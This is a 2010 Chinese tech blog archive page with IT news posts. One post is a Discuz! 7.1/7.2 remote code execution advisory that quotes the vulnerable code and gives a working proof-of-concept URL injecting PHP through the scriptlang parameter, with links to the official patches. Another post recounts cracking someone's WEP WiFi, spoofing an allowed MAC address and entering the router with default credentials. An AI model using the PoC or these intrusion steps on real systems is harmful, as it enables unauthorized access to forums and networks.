2010年1月 的存档

CNNIC新政策 允许个人持有老CN域名

2010年1月15日 秋天
{ 29 条评论 }

      CNNIC新龟腚露出来了,对于仍然希望保留自己CN域名的朋友来说是个好消息。

      据域名圈内人士透露,中国互联网络信息中心(CNNIC)14日晚间对外发布CN域名最新管理规定,新规允许个人持有老CN域名,并允许这部分域名进入市场交易。
据了解,这项新规仅针对 2009年12月14日之前注册的CN域名,新规允许个人持有和交易老CN域名,但域名注册信息必须符合“真实性、准确性、完整性” 三大原则。而2009年12月14日之后注册的CN域名,必须为企业名义,且今后继续执行个人不得新注册CN域名的规定。

      据知情人透露,CNNIC只是口头传达了这项新规,目前尚未对外公布正式的文件。

      多名域名投资人士表示,新规将活跃域名交易市场,CN域名交易价格将有所上升。

转载请尊重版权,出处:秋天博客,零点空间
本文链接: http://www.cfresh.net/it-web-news/8

收藏与分享

IT网络资讯 ,

第一消息:谷歌(Google Inc.)可能退出中国业务

2010年1月13日 秋天
{ 29 条评论 }

谷歌在其官方博客上于当地时间1月12日下午3点发布了一篇题为“A new approach to China”的文章,指出由于受到黑客攻击和不愿对Google.cn的搜索结果进行审查,谷歌可能考虑关闭Google.cn甚至关闭其在中国的办公室。
博客原文地址:http://googleblog.blogspot.com/2010/01/new-approach-to-china.html
注:BlogSpot已经被GWF QJ了,需要用代理、VPN等方式翻墙查看,这里秋天把原文援引过来并附翻译中文版:

阅读更多…

转载请尊重版权,出处:秋天博客,零点空间
本文链接: http://www.cfresh.net/it-web-news/9

收藏与分享

IT网络资讯 ,

IE导入收藏夹提示“书签文件无效”解决办法

2010年1月12日 秋天
{ 5 条评论 }

      小方法一则,留此备查。
      一个同事重装了系统后在导入IE收藏夹时提示”书签文件无效“,原因:文件的编码不对。

      解决方法:用记事本或者其他支持编码格式的文本编辑器打开备份的文件,然后另存为ANSI编码格式htm文件即可。


注意另存时选择编码格式为”ANSI”

转载请尊重版权,出处:秋天博客,零点空间
本文链接: http://www.cfresh.net/pc-tech/10

收藏与分享

计算机应用 ,

百度今日被黑!!【多图+动态更新】

2010年1月12日 秋天
{ 16 条评论 }

      超级猛料,今天百度被黑!
      秋天在第一时间收集了不同地方的百度首页截图。

百度被黑


我这里打开的百度首页截图,怎么会跟雅虎扯上关系呢?


百度被黑


百度知道同样打不开


百度被黑


网友截图



传说中的波斯语?



这张最为清楚,被“伊朗网络部队”黑了?

      截止目前,国内多处地方出现了百度首页不能正常打开的问题,而部分地区可以正常访问。
      据分析可能是由于域名解析问题所致,使用IP仍然可以访问百度首页:
      http://202.108.22.5/

      2010-01-12 13:09更新:

      百毒已经可以正常访问,但旗下的空间等产品栏目仍存在访问故障。
      已经有伊朗网站遭到国内黑客攻击,上图:

伊朗1.12被黑网站


http://www.iribu.ir


伊朗1.12被黑网站


伊朗一个政府网站:http://www.pankration.gov.ir


伊朗1.12被黑网站


http://www.room98.ir

      真杯具,我相信是有人或者组织利用了REGISTER.COM的程序漏洞来恶意挑拨中国和伊朗的关系。曾经跟伊朗人打过交道,他们是把我们当兄弟看的,所谓的”伊朗网络军“来攻击百毒根本不合逻辑。

      2010-01-12 14:22更新,更多伊朗被黑网站:

伊朗1.12被黑网站


http://www.mousavian.ir/


伊朗1.12被黑网站


http://www.englishportal.ir/stu.asp


伊朗1.12被黑网站


http://www.diabetes.ir/home/

转载请尊重版权,出处:秋天博客,零点空间
本文链接: http://www.cfresh.net/web-security/11

收藏与分享

网络安全 ,

网易163再度开放POP3/SMTP,携手其他措施启动“@计划”

2010年1月11日 秋天
{ 13 条评论 }

      网易邮箱(126、163、yeah.net)的老用户都知道从2006年11月16日起,网易免费邮件系统的POP3及SMTP服务暂停开通,只有此前已经开通POP3及SMTP服务的邮箱帐号仍能正常使用。 这一做法广为众多网民诟病,今日网易启动了“@计划”,揭示未来邮箱四大趋势,计划之一就是重新为126、163及yeah.net免费邮箱开放POP3/SMTP服务
      在2006年11月16日之后注册网易邮箱的用户现在可以体验客户端收发邮件了,而且邮箱的默认设置现在已经开启了POP3/SMTP,只需在邮件客户端设置即可,客户端服务器配置如下:

      126免费邮:POP3服务器:pop.126.com   SMTP服务器:smtp.126.com
      163免费邮:POP3服务器:pop.163.com   SMTP服务器:smtp.163.com
      yeah.net免费邮:POP3服务器:pop.yeah.net  SMTP服务器:smtp.yeah.net

      网易“@计划“预言的未来邮箱四大趋势:

      布局邮箱未来打造“future@网易.com”  

      网易邮箱的负责人详细解释了这个计划:@是邮件的标志,也是邮件行业的标志,是众多邮箱人为之奋斗的目标,我们这次传播的是”@你身边,@每一天”,我们希望我们的邮箱通过自己的努力,能永远“在你身边,在每一天”,让更多的中国人享受到电子邮件服务的便利。@计划包括四个方面:@U、@3G、s@fe及f@st。@U象征”以你为本”,满足3亿邮箱用户不断增长的需求;@3G象征着邮箱与手机相关服务,此次开发手机号码邮箱的宗旨是“有手机号就有网易手机号码邮箱”;s@fe和f@st则代表用户关注很多的邮箱安全性问题及邮箱速度。  

      有业界人士指出,作为中国第一大电子邮件服务商的网易提出此计划,不仅赋予了“@”代表的邮箱行业以新的内涵,@计划推出的全新面貌的电子邮箱可以称之为“future@网易.com”,网易重拳布局邮箱未来的同时,也让网易邮箱成为了行业风向标,同时揭示了未来邮箱发展的四大发展趋势:以用户为本、3G邮箱、邮箱安全性以及邮箱加速。电子邮箱也在其发展的过程中,日益向公益化发展,并与其它网络服务一起为3G助力,为网络安全、改善整个互联网信息流通做着贡献,并朝着满足网民需求的方向不断前进。

      邮箱服务“以你为本”

      从研发中国第一个中文电子邮件系统至今已有12年的经验沉淀,目前拥有3亿有效用户,每分钟注册人数280人,每天接收到3.5亿次发信请求,平均每秒近4000次,网易邮箱每天都在以3亿用户的邮件通讯为己任,每天为3亿用户创造奇迹。

      网易邮箱此次经过长大达半年的研发,在邮箱基础功能上精耕细作,发布了闪电邮2.0客户端,增设了全文翻译、退信全中文、群发单显、容量翻倍等,所有的功能都从细节上想用户之所想,其中闪电邮2.0客户端的收发邮件速度比同类软件高一个数量级,全文翻译让用户方便阅读英文邮件,容量翻倍让用户拥有“永远用不满”的网易免费邮箱。同时不断挖掘用户新需求,照顾用户社区互动及体验新功能的需要,发布了多个用户欢迎的扩展功能:比如让3亿邮箱用户爱上阅读的订阅平台、突破邮件框架的邮箱即时聊天、让用户体验新功能快速反馈建议的实验室,很有趣味的明信片及邮票交换功能等。

      手机号码邮箱是大势所趋

      2010年1月4日,网易发布了秘密研发半年之久的手机号码邮箱(http://reg.e.163.com),此次网易开放了手机帐号邮箱资源,只要你知道好友的手机号,就可以给他发邮件,发信格式是138****9876(支持所有手机号段)@163.com。在中国联通3G业务全面商用的今天,网易手机号码邮箱可免费抢注,支持三大运营商的3G技术,把3亿邮箱用户带入手机邮市场,必将带动行业洗牌,同时可享受50M大附件和2G超大附件服务。这意味着,163邮箱用户可优先实现“一箱双号”,手机帐号和字母帐号均可登录,实现双号资料同步,支持三大手机运营商,换号无风险,163邮箱将成为网民首选的终生邮箱。

      同期推向市场的还有“短信通知”服务,用户可以在收到邮件时获得短信通知,也可以在发送邮件时,选择短信通知收件人,可做到“收发邮件都有短信通知”,支持手机支付和在线支付,用平民化价格也可享受高端商务服务。

      邮箱安全是用户之本

      据调查,邮箱用户通常喜欢用简单的密码,邮箱安全问题就显得十分重要。网易邮箱具有超强的反垃圾邮件能力,使用全球最实时更新的邮件杀毒引擎,病毒邮件过滤接近100%,垃圾邮件拦截率98%,同时在收信页面设置反垃圾邮件入口,发动三亿用户举报垃圾邮件。网易邮箱还在此次“@计划”中,增加了保障邮箱安全的安全系数、安全锁。

      “安全系数”通过对邮箱帐号的密码保护方式、密码强度进行评级,让帐号安全一目了然,引导用户关注帐号安全,完善密码保护方式。“安全锁”则是对邮箱内的“记事本”、“网易网盘”、“百宝箱理财易”、“自定义文件夹”四个范围内的信息进行再次加锁保护,可防止他人使用、偷看用户私密文件,保证个人邮箱私隐安全。

      邮箱加速惠及六成网民

      2009年10月15日,在网易公司CEO丁磊的亲自设计指导下,Coremail技术团队完成了“邮箱加速”功能的开发。目前这一功能部署到了旗下的全系列邮箱,该项功能将极大提高网易不同域名间用户的邮件收发速度,中国60%以上的邮件用户将可以体验到邮件加速带来的便捷。    据了解,邮件加速功能实质上是通过一个私有通讯协议,对投递邮件进行压缩,进而实现加快邮件的投递速度的目的。测试数据显示,在Coremail系统之间的通信速度相较以往的邮件传输速度提升将近一倍,被黑客截取邮件数据的可能性也大大降低,同样的邮件在压缩之后就可以节省将近一半的时间。  

      同时,网易邮箱大量布局海外服务器,大幅提升和国外的通信速度;并开设教育网绿色通道,校园用户也可以高速访问。同时运用业内顶尖的最新一代ajax引擎技术,不断优化的ajax引擎,使用户得到快速的登录体验。

      作为拥有3亿用户的邮件服务商,网易邮箱的采取的这一系列提速行动,可大量节约的信息流量,对改善整个互联网信息流通起到

转载请尊重版权,出处:秋天博客,零点空间
本文链接: http://www.cfresh.net/it-web-news/12

收藏与分享

IT网络资讯

如何在Windows7下修改网卡MAC地址【附Realtek8187L XP驱动下载】

2010年1月10日 秋天
{ 7 条评论 }

      终于有时间写一篇自己的文章了。
      话说12月秋天真好的推荐下买了一块FreeWIFILink的外置无线网卡(也就是传说中的卡皇),回宿舍折腾了一下,搜索信号并破解了一个WEP加密的AP信号源,信号强度很好,但在实际连接的时候却怎么也连不上去,根本没有输入密钥的对话框出现。无奈切换回XP提示“Windows无法连接到选定网络,网络可能不在区域中。请刷新可用网络的列表,重新尝试”。
      分析了一下,要么是由于信号虚高(很多卡皇都存在此问题)要么是由于对方做了MAC地址过滤。但信号虚高的问题很快被排除了,因为另一个显示更弱的信号在连接时都会提示输入密钥,因此重点放在了MAC地址过滤上。重启机器用BT3引导系统,等了一会终于看到连接到该AP的客户端列表,赶紧抄下来回去更改。
      在Win7下发现FreeWIFILink网卡在设备管理器的“高级”选项卡内根本没有MAC地址这一项,后来按网上的方法到到注册表下给这块网卡“高级”选项卡添加了“地址”选项。“地址”选项是有了,也能指定MAC地址了,但就是不能生效,无论修改后是禁用/启用网卡还是重启实际MAC地址都未曾改变。后来试过MAC修改工具–K-MAC,仍然不能奏效。
      后来到国外的论坛上翻了翻,找出了解决办法:其实是因为网卡的Win7驱动做了限制,不再支持MAC地址修改。只要找到XP下的驱动或者尝试老版本的Vista驱动就能搞定。
      在安装了FreeWIFILink的XP版驱动后,再使用前面提到的K-MAC就能完美修改MAC地址了。

K-mac

      事后证明,果然是MAC地址过滤,用了一个正常连接到AP的MAC后就可以输入密钥连接了;随后用默认账号、密码进入路由器设置同样印证了这一点。
      Realtek 8187L XP驱动程序下载地址在这里

转载请尊重版权,出处:秋天博客,零点空间
本文链接: http://www.cfresh.net/pc-tech/13

收藏与分享

计算机应用 ,

Discuz!爆高危漏洞 各大网站堪危【附补丁下载地址】

2010年1月7日 秋天
{ 29 条评论 }

      有一段时间没发布安全新闻了,昨天Discuz!程序爆出高危漏洞,主要存在于7.1&7.2版本论坛程序中,请各论坛站长关注。
      据了解,昨日晚些时候一民间安全组织t00ls的成员发现了Discuz!最新版本的高危漏洞,该漏洞可导致直接获得WEBSHELL,目前使用Discuz7.2版本的站点不在少数,目前官方还未有补丁,站长们可按照oldjun的发布的修补方案进行临时修复。黑客X档案等一些使用discuz!最新版的论坛都一度被攻击进而无法访问。
      详细漏洞说明(原始出处在这里
      首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xhming给了个poc,我给了个exp,确实发现的是同一个问题。截止夜里2点多种我下线,还只有t00ls核心群里几个人知道我给出的exp,可我怎么也想不到,经过半天时间,exp就满天飞了,而且确实出自昨天我的那个版本。

      特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。

      漏洞介绍:

      Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。

      漏洞分析:

      下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:

      一、漏洞来自showmessage函数:

复制内容到剪贴板程序代码程序代码
function showmessage($message, $url_forward = ”, $extra = ”, $forwardtype = 0) {
    extract($GLOBALS, EXTR_SKIP);//危险的用法,未初始化的变量可以直接带进函数,直接导致了问题产生,from www.oldjun.com
    global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
    define(‘CACHE_FORBIDDEN’, TRUE);
    $hookscriptmessage = $show_message = $message;$messagehandle = 0;
    $msgforward = unserialize($_DCACHE['settings']['msgforward']);
    $refreshtime = intval($msgforward['refreshtime']);
    $refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
    $msgforward['refreshtime'] = $refreshtime * 1000;
    $url_forward = empty($url_forward) ? ” : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
    $seccodecheck = $seccodestatus & 2;
    if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
        $statlogfile = DISCUZ_ROOT.’./forumdata/funcstat.log’;
        if($fp = @fopen($statlogfile, ‘a’)) {
            @flock($fp, 2);
            if(is_array($funcstatinfo)) {
                $funcstatinfo = array_unique($funcstatinfo);
                foreach($funcstatinfo as $funcinfo) {
                    fwrite($fp, funcstat_query($funcinfo, $message).”\n”);
                }
            } else {
                fwrite($fp, funcstat_query($funcstatinfo, $message).”\n”);
            }
            fclose($fp);
            $funcstatinfo = $GLOBALS['funcstatinfo'] = ”;
        }
    }

    if(!defined(‘STAT_DISABLED’) && STAT_ID > 0 && !IS_ROBOT) {
        write_statlog($message);
    }

    if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
        updatesession();
        dheader(“location: “.str_replace(‘&’, ‘&’, $url_forward));
    }
    if(!empty($infloat)) {
        if($extra) {
            $messagehandle = $extra;
        }
        $extra = ”;
    }
    if(in_array($extra, array(‘HALTED’, ‘NOPERM’))) {
        $discuz_action = 254;
    } else {
        $discuz_action = 255;
    }

    include language(‘messages’);

    $vars = explode(‘:’, $message);//只要含:就可以了
    if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可,用:分割
        eval(“\$show_message = \”".str_replace(‘”‘, ‘\”‘, $scriptlang[$vars[0]][$vars[1]]).”\”;”);//$scriptlang未初始化,可以自定义,from www.oldjun.com
    } elseif(isset($language[$message])) {
        $pre = $inajax ? ‘ajax_’ : ”;
        eval(“\$show_message = \”".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message]).”\”;”);
        unset($pre);
    }

    ……
}

<
br/>      二、DZ的全局机制导致了未初始化的参数可以任意提交:

复制内容到剪贴板程序代码程序代码
foreach(array(‘_COOKIE’, ‘_POST’, ‘_GET’) as $_request) {
    foreach($$_request as $_key => $_value) {
        $_key{0} != ‘_’ && $$_key = daddslashes($_value);
    }
}

      三、misc.php正好有个可以自定义message的点,其实也是未初始化:

复制内容到剪贴板程序代码程序代码
elseif($action == ‘imme_binding’ && $discuz_uid) {

    if(isemail($id)) {
        $msn = $db->result_first(“Select msn FROM {$tablepre}memberfields Where uid=’$discuz_uid’”);
        $msn = explode(“\t”, $msn);
        $id = dhtmlspecialchars(substr($id, 0, strpos($id, ‘@’)));
        $msn = “$msn[0]\t$id”;
        $db->query(“Update {$tablepre}memberfields SET msn=’$msn’ Where uid=’$discuz_uid’”);
        showmessage(‘msn_binding_succeed’, ‘memcp.php’);
    } else {
        if($result == ‘Declined’) {
            dheader(“Location: memcp.php”);
        } else {
            showmessage($response['result']);//$response没有初始化,可以自定义,from www.oldjun.com

        }
    }

   }

      四、漏洞利用:

      showmessage函数里$vars = explode(‘:’, $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。

      五、漏洞修复:

      官方补丁已经放出,下载地址:
      Discuz! 7.1:http://download2.comsenz.com/Discuz/patch/7.1/D710_UPGRADE_TO_20100110.zip
      Discuz! 7.2:http://download.comsenz.com/Discuz/patch/7.2/D720_UPGRADE_TO_20100110.zip

      poc:

      (应Saiy的要求,不发exp了!)注册一个用户登陆,然后提交
      misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

转载请尊重版权,出处:秋天博客,零点空间
本文链接: http://www.cfresh.net/web-security/14

收藏与分享

网络安全 ,
Page 2 of 3123